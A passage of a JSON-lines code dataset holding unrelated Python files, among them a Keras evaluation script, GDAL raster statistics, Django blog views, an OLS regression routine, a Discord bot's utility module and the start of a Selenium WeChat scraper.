model.compile(loss='categorical_crossentropy', optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\n score = model.evaluate(X_train, y_train, verbose=0)\r\n print()\r\n print('Training loss:', score[0])\r\n print('Training accuracy:', score[1])\r\n\r\n score = model.evaluate(X_test, y_test, verbose=0)\r\n print()\r\n print('Validation loss:', score[0])\r\n print('Validation accuracy:', score[1])\r\n\r\n # Determine validation examples that the model got wrong\r\n y_pred = np.array([np.argmax(y) for y in model.predict(X_test)])\r\n y_true = np.array([np.argmax(y) for y in y_test])\r\n mistakes = (y_pred != y_true)\r\n X_wrong = X_test[mistakes].reshape(-1, 28, 28) # To visualize properly\r\n y_wrong = y_pred[mistakes]\r\n y_right = y_true[mistakes]\r\n\r\n # Visualize some of the validation examples the model got wrong\r\n nrow, ncol = 3, 5\r\n for i in range(nrow):\r\n for j in range(ncol):\r\n idx = i * ncol + j\r\n plt.subplot(nrow, ncol, idx + 1)\r\n plt.imshow(X_wrong[idx], cmap='gray')\r\n plt.title('Pred: %d\\nTrue: %d' % (y_wrong[idx], y_right[idx]))\r\n plt.axis('off')\r\n\r\n plt.suptitle('Validation Images %s Got Wrong' % model_name)\r\n plt.savefig(os.path.join(cwd, 'img', '%s_mistakes.png') % model_name)\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__': main()\r\n","sub_path":"Neural_Net_Exercise/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"494328804","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 9 13:54:43 2020\n\n\"\"\"\nimport gdal\nimport os\nimport numpy as np\n\ndef absoluteFilePaths(directory): \n result = []\n for dirpath,_,filenames in os.walk(directory):\n for f in filenames:\n if f[-3:] == 'tif':\n result.append(os.path.abspath(os.path.join(dirpath, f))) \n return result\n\ndef calculateSingleResiduals(input_file, threshold = 0):\n residual_list =[]\n ds = gdal.Open(input_file)\n array = ds.GetRasterBand(1).ReadAsArray()\n for i in range(len(array)):\n for j in range(len(array[i])):\n pixel_value = array[i][j]\n if pixel_value != -9999000 and pixel_value > threshold:\n residual_list.append(array[i][j])\n return residual_list\n\ndef calculateResiduals(input_folder, threshold = 0):\n residual_list = []\n filename_generator = absoluteFilePaths(input_folder)\n for filename_residual_map in filename_generator:\n residual_list += calculateSingleResiduals(filename_residual_map, threshold)\n return residual_list\n \ndef calculateAbsoluteResiduals(input_folder):\n residuals_list = []\n filename_generator = absoluteFilePaths(input_folder)\n for filename_residual_map in filename_generator:\n ds = gdal.Open(filename_residual_map)\n array = ds.GetRasterBand(1).ReadAsArray()\n for i in range(len(array)):\n for j in range(len(array[i])):\n abs_pixel_value = abs(array[i][j])\n if abs_pixel_value != 9999000:\n residuals_list.append(abs_pixel_value)\n ds.FlushCache()\n return residuals_list\n\n\n#****************************************************************************#\n#* * M * A * I * N * *#\n#****************************************************************************#\n\ninput_folder_OPERA = '/thesis/data_analysis/opera/2tiff_p/2015'\n\nfilenames = absoluteFilePaths(input_folder_OPERA)\n\nsumation = []\n\nfor i, filename in enumerate(filenames): # add count 2darray\n \n ds = gdal.Open(filename)\n band = ds.GetRasterBand(1)\n array = band.ReadAsArray()\n mx = np.ma.masked_values(array, -9999000)\n\n mask_arr = np.ma.masked_where(mx < 0, mx) \n\n filesum = mask_arr.sum()\n\n sumation.append((filename, filesum))\n \ndef take_second(elem):\n return elem[1]\n\nhello = sorted(sumation, key = take_second)\n\n","sub_path":"scripts/statistics/checksum.py","file_name":"checksum.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"280368048","text":"# 1312 소수\nif __name__ == \"__main__\":\n A, B, N = map(int, input().split())\n A %= B\n i = 1\n while True:\n A *= 10\n if i == N:\n print(A // B)\n break\n A %= B\n i += 1","sub_path":"Baekjoon/1312.py","file_name":"1312.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"451945858","text":"from models.projectors.NickelProjector import NickelProjector \nfrom models.projectors.Type2VecProjector import Type2VecProjector\nfrom torch.nn import Module, ModuleDict\n\nclass MultiProjectorManager(Module):\n\n def __init__(self, config):\n\n super().__init__()\n \n self.nametag = 'MultiProjectorsManager'\n\n self.setup_classes_factory()\n\t\t\n self.classes = self.get_classes(config)\n\n self.projectors = ModuleDict({k:cl(config) for k, cl in self.classes.items()})\n # print('projectors: {}'.format(self.projectors))\n\n def setup_classes_factory(self):\n self.factory_dict = {\n \"HyperbolicProjector\": NickelProjector,\n 'CosineProjector': Type2VecProjector\n }\n\n def get_classes(self, conf):\n self.names = conf[self.nametag]['PROJECTOR_CONFIGS'].split(' ')\n classes = {}\n for name in self.names:\n classes[conf[name]['NAME']] = self.factory_dict[conf[name]['Class']]\n return classes\n \n def forward(self, vec):\n projections = {}\n for k, projector in self.projectors.items():\n projections[k] = projector(vec)\n return projections\n\n\n\n","sub_path":"models/projectors/multiProjectorManager.py","file_name":"multiProjectorManager.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"316962257","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 3 13:54:51 2019\r\n\r\n@author: adhan\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport os\r\n\r\nNumKue = 1\r\njajan = 'Ape'\r\n# =============================================================================\r\n# Start\r\n# =============================================================================\r\n\r\nfor filename in os.listdir('jajanan_black/'+jajan):\r\n print(filename)\r\n img = cv2.imread('jajanan_black/'+jajan+'/'+filename)\r\n constant = cv2.copyMakeBorder(img,left = 0, right = 0,\r\n top = 500, bottom = 500,\r\n borderType = cv2.BORDER_CONSTANT,\r\n value = [0,0,0])\r\n dim = (1000,1000)\r\n resized = cv2.resize(constant, dim, interpolation = cv2.INTER_NEAREST)\r\n cv2.imwrite('jajanan_resized/'+jajan+'/'+jajan+'_resized_'+str(NumKue)+'.jpg', resized)\r\n NumKue+=1\r\nNumkue = 1","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"351808526","text":"from django import forms\nfrom djrichtextfield.widgets import RichTextWidget\nfrom news.models import News\nfrom django.forms import ModelForm, Textarea, CheckboxInput\n\n\nclass NewsForm(forms.ModelForm):\n image = forms.ImageField(required=False)\n attachments = forms.FileField(required=False,\n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n class Meta:\n model = News\n fields = ('title', 'content', 'tags', 'image')\n required = ('title', 'content')\n\n def save(self, commit=True, author=None):\n news = super(NewsForm, self).save(commit=False)\n news.author = author\n if commit:\n news.save()\n return news\n\n\nclass NewsModelForm(ModelForm):\n\n class Meta:\n model = News\n fields = ('__all__')\n widgets = {\n 'content': Textarea(\n attrs={'id': 'news_textarea'}\n ),\n 'share_on_facebook': CheckboxInput(\n attrs={'id': 'news_share_on_fb'}\n )\n }\n","sub_path":"news/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"46132207","text":"import math\nimport fire\nfrom typing import *\nimport re\nimport itertools\nfrom collections import deque\n\nfrom dataclasses import dataclass, field\nimport numpy as np\n\n\ndef _part_one(data):\n decks = data\n round = 0\n while True:\n if len(decks[0]) == 0 or len(decks[1]) == 0:\n break\n print(f\"round {round}\")\n c0 = decks[0].popleft()\n c1 = decks[1].popleft()\n print(f\"c0: {c0} c1: {c1}\")\n if c0 > c1:\n print(\"p0 won!\")\n decks[0].append(c0)\n decks[0].append(c1)\n elif c1 > c0:\n print(\"p1 won!\")\n decks[1].append(c1)\n decks[1].append(c0)\n else:\n raise ValueError()\n round += 1\n\n winner = decks[0] if len(decks[0]) > 0 else decks[1]\n\n return sum(\n (len(winner) - i) * c \n for i, c in enumerate(winner)\n )\n\n\n@dataclass\nclass Result:\n winner: int\n deck0: Any\n deck1: Any\n\n\ndef _recursive_combat(deck0, deck1, game):\n r = 0\n total_sets = set()\n while True:\n if len(deck0) == 0 or len(deck1) == 0:\n winner = 0 if len(deck1) == 0 else 1\n return Result(winner, deck0, deck1)\n if (tuple(deck0), tuple(deck1)) in total_sets:\n return Result(0, deck0, deck1)\n else:\n total_sets.add((tuple(deck0), tuple(deck1)))\n\n print(f\"round {r}, game {game}\")\n c0 = deck0.popleft()\n c1 = deck1.popleft()\n if c0 <= len(deck0) and c1 <= len(deck1):\n subdeck0 = deque([deck0[_] for _ in range(c0)])\n subdeck1 = deque([deck1[_] for _ in range(c1)])\n result = _recursive_combat(subdeck0, subdeck1, game+1)\n winner = result.winner\n else:\n winner = 0 if c0 > c1 else 1\n\n print(f\"c0: {c0} c1: {c1}\")\n if winner == 0:\n print(\"p0 won!\")\n deck0.append(c0)\n deck0.append(c1)\n elif winner == 1:\n print(\"p1 won!\")\n deck1.append(c1)\n deck1.append(c0)\n else:\n raise ValueError()\n\n r += 1\n \n\ndef _part_two(data):\n decks = data\n\n result = _recursive_combat(decks[0], decks[1], 0)\n\n winning_deck = result.deck0 if result.winner == 0 else result.deck1\n\n return sum(\n (len(winning_deck) - i) * c \n for i, c in enumerate(winning_deck)\n )\n\n\ndef run(fname: str, part: int):\n with open(fname, 'r') as f:\n lines = f.readlines()\n\n data = [deque(), deque()]\n player = 0\n for line in lines:\n if line.startswith('Player'):\n continue\n if line.strip() == '':\n player += 1\n continue\n\n data[player].append(int(line.strip()))\n\n print(str(data))\n\n if part == 1:\n r = _part_one(data)\n print('part 1: ' + str(r))\n elif part == 2:\n r = _part_two(data)\n print('part 2: ' + str(r))\n else:\n print(f\"Missing part: {part}\")\n\n\nif __name__ == '__main__':\n fire.Fire(run)\n\n","sub_path":"day22/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"363989162","text":"# -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\ntop = '../..'\n\ndef build(bld):\n\n bld.objects(\n target='ndnpeek-objects',\n source=bld.path.ant_glob('ndnpeek/*.cpp', excl='ndnpeek/main.cpp'),\n use='core-objects')\n\n bld.program(\n target='../../bin/ndnpeek',\n source='ndnpeek/main.cpp',\n use='ndnpeek-objects')\n\n bld.program(\n target='../../bin/ndnpoke',\n source='ndn-poke.cpp',\n use='core-objects')\n\n ## (for unit tests)\n\n bld(name='peek-objects',\n use='ndnpeek-objects')\n","sub_path":"tools/peek/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129826795","text":"from django.shortcuts import get_object_or_404\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\n\nfrom .models import BlogPost, Category\n\nclass BlogPostListView(ListView):\n \"\"\"A list view for our BlogPosts...\"\"\"\n template_name = 'blog/blogpost_list.html'\n\n model = BlogPost\n\n paginate_by = 10\n\n\nclass BlogPostListViewByCategory(ListView):\n template_name = 'blog/blogpost_list.html'\n\n model = BlogPost\n\n paginate_by = 10\n\n def get_queryset(self):\n self.category = get_object_or_404(Category, slug=self.kwargs[\"slug\"])\n return BlogPost.objects.filter(categories=self.category)\n\n\nclass BlogPostDetailView(DetailView):\n \"\"\"A list view for our BlogPosts...\"\"\"\n model = BlogPost\n","sub_path":"src/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131394725","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n\tN = NI()\n\tans = \"\"\n\twhile N != 0:\n\t\tif N % 2:\n\t\t\tans += \"1\"\n\t\t\tN = (N-1) // (-2)\n\t\telse:\n\t\t\tans += \"0\"\n\t\t\tN = N // (-2)\n\tif ans:\n\t\tprint(ans[::-1])\n\telse:\n\t\tprint(0)\n\t\t\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"Python_codes/p03286/s837339540.py","file_name":"s837339540.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"64378401","text":"#!encoding=utf-8\nimport numpy as np\nimport scipy.linalg\nfrom scipy.stats import t\n\ndef ols(y, x):\n results = {}\n nobs, nvar = x.shape\n nobs2, junk = y.shape\n if nobs != nobs2: return results\n\n results['meth'] = 'ols'\n # results['y'] = y\n results['nobs'] = nobs\n results['nvar'] = nvar\n\n if nobs <10000:\n q, r = scipy.linalg.qr(x, 0)\n r1 = r.conj().T\n xpxi = scipy.linalg.lstsq(r1.dot(r), np.eye(nvar))[0]\n else:\n x1 = x.conj().T\n xpxi = scipy.linalg.lstsq(x1.dot(x), np.eye(nvar))[0]\n\n x1 = x.conj().T\n results['beta'] = xpxi.dot(x1.dot(y))\n results['yhat'] = x.dot(results['beta'])\n results['resid'] = y - results['yhat']\n resid = results['resid'].conj().T\n sigu = resid.dot(results['resid'])\n results['sige'] = sigu/(nobs-nvar)\n diag_xpxi = np.array(np.diag(xpxi)).reshape(-1,1)\n\n tmp = results['sige'] * diag_xpxi\n sigb = np.sqrt(tmp)\n results['bstd'] = sigb\n\n tcrit = t.ppf(0.025, nobs)\n\n results['bint'] = np.array([results['beta'] - tcrit * sigb, results['beta'] + tcrit * sigb])\n results['tstat'] = results['beta'] / np.sqrt(tmp)\n\n ym = y - y.mean()\n rsqr1 = sigu\n\n ym1 = ym.conj().T\n rsqr2 = ym1.dot(ym);\n\n results['rsqr'] = 1.0 - rsqr1/rsqr2\n rsqr1 = rsqr1/(nobs-nvar)\n rsqr2 = rsqr2/(nobs-1.0)\n if rsqr2 != 0:\n results['rbar'] = 1 - (rsqr1/rsqr2)\n else:\n results['rbar'] = results['rsqr']\n\n ediff = results['resid'][1:nobs] - results['resid'][0:nobs-1]\n ediff1 = ediff.conj().T\n results['dw'] = ediff1.dot(ediff)/sigu\n\n return results\n\n\nif __name__=='__main__':\n x = open('x.csv').read()\n x = np.array([[float(i)] for i in x.split('\\r\\n') if i])\n y = open('y.csv').read()\n y = np.array([[float(i)] for i in y.split('\\r\\n') if i])\n r_ols = ols(y, x)\n\n from adf import adf\n\n\n","sub_path":"web/logic/mf/ols.py","file_name":"ols.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94337174","text":"''' Plot the objective-generation plot for a GA method.\r\n Help to analyse the performance of the GA.\r\n'''\r\nfrom datetime import datetime\r\nimport time\r\nimport numpy as np\r\nimport csv\r\nfrom geneticAlgorithm013 import select_jobs, read_job, select_prices, read_price, read_maintenance, read_product_related_characteristics\r\nfrom geneticAlgorithm013 import get_energy_cost, get_failure_cost, GA\r\n\r\nPOP_SIZE = 8 \r\nCROSS_RATE = 0.6\r\nMUTATION_RATE = 0.8\r\nN_GENERATIONS = 200\r\n\r\nif __name__ == '__main__':\r\n ''' Use start_time and end_time to determine a waiting job list from records\r\n Available range: 2016-01-19 14:21:43.910 to 2017-11-15 07:45:24.243\r\n '''\r\n start_time = datetime(2016, 11, 3, 6, 0)\r\n end_time = datetime(2016, 11, 8, 0, 0)\r\n \r\n price_dict_new = read_price(\"price.csv\")\r\n job_dict_new = select_jobs(start_time, end_time, read_job(\"jobInfoProd_ga_013.csv\"))\r\n failure_dict_new = read_maintenance(\"maintenanceInfluenceb4a4.csv\", price_dict_new)\r\n raw_material_unit_price_dict = read_product_related_characteristics(\"productProd_ga_013.csv\")\r\n\r\n \r\n DNA_SIZE = len(job_dict_new)\r\n waiting_jobs = [*job_dict_new]\r\n \r\n if not waiting_jobs:\r\n raise ValueError(\"No waiting jobs!\")\r\n else:\r\n first_start_time = job_dict_new.get(waiting_jobs[0])[1] # Find the start time of original schedule \r\n \r\n# exit()\r\n\r\n# print(waiting_jobs) \r\n# elite_cost = float('inf')\r\n# elite_schedule = []\r\n analyse_dict = {}\r\n best_schedule = []\r\n best_cost = []\r\n \r\n original_schedule = waiting_jobs \r\n analyse_dict.update({0:get_energy_cost(original_schedule, first_start_time, job_dict_new, price_dict_new, raw_material_unit_price_dict)+\r\n get_failure_cost(original_schedule, first_start_time, job_dict_new, failure_dict_new, raw_material_unit_price_dict)}) # Add origin to index 0\r\n \r\n weight1 = 1\r\n weight2 = 1\r\n start_stamp = time.time()\r\n ga = GA(dna_size=DNA_SIZE, cross_rate=CROSS_RATE, mutation_rate=MUTATION_RATE, pop_size=POP_SIZE, pop = waiting_jobs,\r\n job_dict=job_dict_new, price_dict=price_dict_new, failure_dict=failure_dict_new,\r\n product_related_characteristics_dict=raw_material_unit_price_dict, start_time=first_start_time,\r\n weight1=weight1, weight2=weight2)\r\n \r\n for generation in range(1, N_GENERATIONS+1):\r\n if (generation % 20) == 0:\r\n print(\"Gen: \", generation)\r\n pop, res = ga.evolve(1) # natural selection, crossover and mutation\r\n best_index = np.argmin(res)\r\n# print(\"Most fitted DNA: \", pop[best_index])\r\n# print(\"Most fitted cost: \", res[best_index])\r\n best_schedule = pop[best_index]\r\n best_cost = res[best_index]\r\n analyse_dict.update({generation:res[best_index]})\r\n \r\n end_stamp = time.time()\r\n\r\n print(\"Most fitted DNA:\", best_schedule)\r\n print(\"Most fitted cost:\", best_cost)\r\n \r\n print()\r\n# print(\"Optimal cost:\", elite_cost)\r\n# print(\"Optimal schedule:\", elite_schedule)\r\n print(\"Time consumption:\", end_stamp-start_stamp)\r\n \r\n print()\r\n \r\n print(\"Original schedule: \", original_schedule)\r\n print(\"Original schedule start time:\", first_start_time)\r\n print(\"Original cost: \", get_energy_cost(original_schedule, first_start_time, job_dict_new, price_dict_new, raw_material_unit_price_dict)+\r\n get_failure_cost(original_schedule, first_start_time, job_dict_new, failure_dict_new, raw_material_unit_price_dict))\r\n \r\n \r\n # write the result to csv for plot\r\n with open('ga_013_analyse_plot.csv', 'w', newline='\\n') as csv_file:\r\n writer = csv.writer(csv_file)\r\n for key, value in analyse_dict.items():\r\n writer.writerow([key, value])\r\n ","sub_path":"ELITEPython/ELITE_Simulation/GAAnalysePlot013.py","file_name":"GAAnalysePlot013.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"602458182","text":"import discord\nimport logging\nfrom discord.ext import commands\nimport re\nimport math\nimport random\nimport asyncio\nimport urllib.request\nimport urllib\nimport sqlite3\nimport os\nimport platform\nimport time\nfrom datetime import datetime,timedelta,date\nfrom calendar import timegm\nimport sys\nimport aiohttp\n\n#Emoji code\n##Constants to define emoji codes to use in strings\nEMOJI_COOKIE = str(chr(0x1F36A))\nEMOJI_CAKE = str(chr(0x1F370))\nEMOJI_MUSICNOTES = str(chr(0x1F3B6))\nEMOJI_ROBOT = str(chr(0x1F916))\nEMOJI_SKULL = str(chr(0x1F480))\nEMOJI_WINK = str(chr(0x1F609))\nEMOJI_BELL = str(chr(0x1F514))\nEMOJI_EYEROLL = str(chr(0x1F644))\nEMOJI_BICEPS = str(chr(0x1F4AA))\nEMOJI_NECKLACE = str(chr(0x1F4FF))\nEMOJI_WINEGLASS = str(chr(0x1F377))\nEMOJI_FIRE = str(chr(0x1F525))\nEMOJI_SNOWFLAKE = str(chr(0x2744))\nEMOJI_BLOSSOM = str(chr(0x1F33C))\nEMOJI_DAGGER = str(chr(0x1F5E1))\nEMOJI_BULLSEYE = str(chr(0x1F3AF))\nEMOJI_WHIRLYEYES = str(chr(0x1F632))\n\nfrom config import *\nbot = \"\"\n\n#Global constants\nERROR_NETWORK = 0\nERROR_DOESNTEXIST = 1\n\n#Start logging\n#Create logs folder\nos.makedirs('logs/',exist_ok=True)\n##discord.py log\ndiscord_log = logging.getLogger('discord')\ndiscord_log.setLevel(logging.INFO)\nhandler = logging.FileHandler(filename='logs/discord.log', encoding='utf-8', mode='a')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\ndiscord_log.addHandler(handler)\n##NabBot log\nlog = logging.getLogger(__name__ )\nlog.setLevel(logging.DEBUG)\n###Save log to file (info level)\nfileHandler = logging.FileHandler(filename='logs/nabbot.log', encoding='utf-8', mode='a') \nfileHandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\nfileHandler.setLevel(logging.INFO)\nlog.addHandler(fileHandler)\n###Print output to console too (debug level)\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\nconsoleHandler.setLevel(logging.DEBUG)\nlog.addHandler(consoleHandler)\n\n#Database global connections\nuserDatabase = sqlite3.connect(USERDB)\ntibiaDatabase = sqlite3.connect(TIBIADB)\n\nDB_LASTVERSION = 2\n\ndef initDatabase():\n #Database file is automatically created with connect, now we have to check if it has tables\n print(\"Checking database version...\")\n db_version = 0\n try:\n c = userDatabase.cursor()\n c.execute(\"SELECT COUNT(*) FROM sqlite_master WHERE type = 'table'\")\n result = c.fetchone()\n #Database is empty\n if(result is None or result[0] == 0):\n c.execute(\"\"\"CREATE TABLE discord_users (\n id\tINTEGER NOT NULL,\n weight\tINTEGER DEFAULT 5,\n PRIMARY KEY(id)\n )\"\"\")\n c.execute(\"\"\"CREATE TABLE chars (\n id\tINTEGER PRIMARY KEY AUTOINCREMENT,\n user_id\tINTEGER,\n name\tTEXT,\n last_level\tINTEGER DEFAULT -1,\n last_death_time\tTEXT\n )\"\"\")\n c.execute(\"\"\"CREATE TABLE char_levelups (\n char_id\tINTEGER,\n level\tINTEGER,\n date\tINTEGER\n )\"\"\") \n c.execute(\"SELECT tbl_name FROM sqlite_master WHERE type = 'table' AND name LIKE 'db_info'\")\n result = c.fetchone();\n #If there's no version value, version 1 is assumed\n if(result is None):\n c.execute(\"\"\"CREATE TABLE db_info (\n key\tTEXT,\n value\tTEXT\n )\"\"\")\n c.execute(\"INSERT INTO db_info(key,value) VALUES('version','1')\")\n db_version = 1\n print(\"No version found, version 1 assumed\")\n else:\n c.execute(\"SELECT value FROM db_info WHERE key LIKE 'version'\")\n db_version = int(c.fetchone()[0])\n print(\"Version {0}\".format(db_version))\n if db_version == DB_LASTVERSION:\n print(\"Database is up to date.\")\n return\n #Future code to patch database changes\n if db_version == 1:\n #Apply changes\n c.execute(\"ALTER TABLE chars ADD vocation TEXT\")\n c.execute(\"UPDATE chars SET last_level = 0 WHERE last_level = -1\")\n db_version +=1\n print(\"Updated database to version {0}\".format(db_version))\n c.execute(\"UPDATE db_info SET value = ? WHERE key LIKE 'version'\",(db_version,))\n \n finally:\n userDatabase.commit()\n\ndef vocAbb(vocation):\n abbrev = {'None' : 'N', 'Druid' : 'D', 'Sorcerer' : 'S', 'Paladin' : 'P', 'Knight' : 'K',\n 'Elder Druid' : 'ED', 'Master Sorcerer' : 'MS', 'Royal Paladin' : 'RP', 'Elite Knight' : 'EK'}\n try:\n return abbrev[vocation]\n except KeyError:\n return 'N'\n\ndef getLogin():\n if not os.path.isfile(\"login.py\"):\n print(\"This seems to be the first time NabBot is ran (or login.py is missing)\")\n print(\"To run your own instance of NabBot you need to create a new bot account to get a bot token\")\n print(\"https://discordapp.com/developers/applications/me\")\n print(\"Alternatively, you can use a regular discord account for your bot, althought this is not recommended\")\n print(\"Insert a bot token OR an e-mail address for a regular account to be used as a bot\")\n login = input(\">>\")\n email = \"\";\n password = \"\"\n token = \"\"\n if \"@\" in login:\n email = login\n password = input(\"Enter password: >>\")\n elif len(login) >= 50:\n token = login\n else:\n input(\"What you entered isn't a token or an e-mail. Restart NabBot to retry.\")\n quit()\n f = open(\"login.py\",\"w+\")\n f.write(\"#Token always has priority, if token is defined it will always attempt to login using a token\\n\")\n f.write(\"#Comment the token line or set it empty to use email login\\n\")\n f.write(\"token = '{0}'\\nemail = '{1}'\\npassword = '{2}'\\n\".format(token,email,password))\n f.close()\n print(\"Login data has been saved correctly. You can change this later by editing login.py\")\n input(\"Press any key to start NabBot now...\")\n quit()\n return __import__(\"login\")\n\ndef utilsGetBot(_bot):\n global bot\n bot = _bot\n \n\n########formatMessage\n##handles stylization of messages, uppercasing \\TEXT/, lowercasing /text\\ and title casing /Text/\ndef formatMessage(message):\n upper = r'\\\\(.+?)/'\n upper = re.compile(upper,re.MULTILINE+re.S)\n lower = r'/(.+?)\\\\'\n lower = re.compile(lower,re.MULTILINE+re.S)\n title = r'/(.+?)/'\n title = re.compile(title,re.MULTILINE+re.S)\n skipproper = r'\\^(.+?)\\^(.+?)([a-zA-Z])'\n skipproper = re.compile(skipproper,re.MULTILINE+re.S)\n message = re.sub(upper,lambda m: m.group(1).upper(), message)\n message = re.sub(lower,lambda m: m.group(1).lower(), message)\n message = re.sub(title,lambda m: m.group(1).title(), message)\n message = re.sub(skipproper,lambda m: m.group(2)+m.group(3) if m.group(3).istitle() else m.group(1)+m.group(2)+m.group(3) , message)\n return message\n########\n\n########weighedChoice\n##makes weighed choices from message lists where [0] is a value representing the relative odds of picking a message\n###and [1] is the message string\ndef weighedChoice(messages,condition1=False,condition2=False):\n ##find the max range by adding up the weigh of every message in the list\n #and purge out messages that dont fulfil the conditions\n range = 0\n _messages = []\n for message in messages:\n if len(message) == 4:\n if (not message[2] or condition1 in message[2]) and (not message[3] or condition2 in message[3]):\n range = range+message[0]\n _messages.append(message)\n elif len(message) == 3:\n if (not message[2] or condition1 in message[2]):\n _messages.append(message)\n else:\n range = range+message[0]\n _messages.append(message)\n #choose a random number\n rangechoice = random.randint(0, range)\n #iterate until we find the matching message\n rangepos = 0\n for message in _messages:\n if rangechoice >= rangepos and rangechoice < rangepos+message[0]:\n return message[1]\n rangepos = rangepos+message[0]\n #this shouldnt ever happen...\n print(\"Error in weighedChoice!\")\n return _messages[0][1]\n########\n\n########getChannelByServerAndName\n##server_name can be left blank in which case all servers the bot is connected to will be searched\ndef getChannelByServerAndName(server_name : str, channel_name : str):\n if server_name == \"\":\n channel = discord.utils.find(lambda m: m.name == channel_name and not m.type == discord.ChannelType.voice, bot.get_all_channels())\n else:\n channel = discord.utils.find(lambda m: m.name == channel_name and not m.type == discord.ChannelType.voice, getServerByName(server_name).channels)\n return channel\n\n########getChannelByName\n##alias for getChannelByServerAndName(\"\",channel_name)\n##main server is given priority, next all visible servers are searched.\ndef getChannelByName(channel_name : str):\n channel = getChannelByServerAndName(mainserver,channel_name)\n if channel is None:\n return getChannelByServerAndName(\"\",channel_name)\n return channel\n \n########getServerByName\ndef getServerByName(server_name : str):\n server = discord.utils.find(lambda m: m.name == server_name, bot.servers)\n return server\n########\n\n########getUserByName\n##this gets a discord user by its name\n##currently, duplicate usernames will return the first user found(!)\n##priority is given to users in the main server, next all visible channels are searched and finally private channels.\ndef getUserByName(userName):\n user = None\n _mainserver = getServerByName(mainserver)\n if _mainserver is not None:\n user = discord.utils.find(lambda m: m.name.lower() == userName.lower(), _mainserver.members)\n if user is None:\n user = discord.utils.find(lambda m: m.name.lower() == userName.lower(), bot.get_all_members())\n if user is None:\n user = discord.utils.find(lambda m: m.user.name.lower() == userName.lower(), bot.private_channels)\n return user\n########\n\n########getUserById\n##this gets a discord user by its id\ndef getUserById(userId):\n user = discord.utils.find(lambda m: m.id == str(userId), bot.get_all_members())\n if user is None:\n user = discord.utils.find(lambda m: m.user.id == str(userId), bot.private_channels)\n return user\n########\n\n#Returns your local time zone\ndef getLocalTimezone():\n #Getting local time and GMT\n t = time.localtime()\n u = time.gmtime(time.mktime(t))\n #UTC Offset\n return ((timegm(t) - timegm(u))/60/60)\n \n##Returns Germany's timezone, considering their daylight saving time dates\ndef getTibiaTimeZone():\n #Find date in Germany\n gt = datetime.utcnow()+timedelta(hours=1)\n germany_date = date(gt.year,gt.month,gt.day)\n dst_start = date(gt.year,3,(31 - (int(((5 * gt.year) / 4) + 4) % int(7))))\n dst_end = date(gt.year,10,(31 - (int(((5 * gt.year) / 4) + 1) % int(7))))\n if dst_start < germany_date < dst_end:\n return 2\n return 1","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"128461559","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom weixin.weixin.weixin_article import WeixinArticle\nfrom requests.exceptions import ConnectionError\nfrom pyquery import PyQuery as pq\n\n\nclass SeleniumWeixinArticle(WeixinArticle):\n \"\"\"使用selenium模拟浏览器,获取搜狗微信搜索的详细信息,继承WeixinArticle这个类\"\"\"\n proxy = None\n\n def __init__(self):\n \"\"\"初始化浏览器,及部分浏览器信息\"\"\"\n self.browser = webdriver.Chrome(executable_path=\"C:/codeapp/seleniumDriver/chrome/chromedriver.exe\")\n self.wait = WebDriverWait(self.browser, 10)\n super(SeleniumWeixinArticle, self).__init__()\n\n def get_html(self, url, count=1):\n \"\"\"重写WeixinArticle 中的get_html 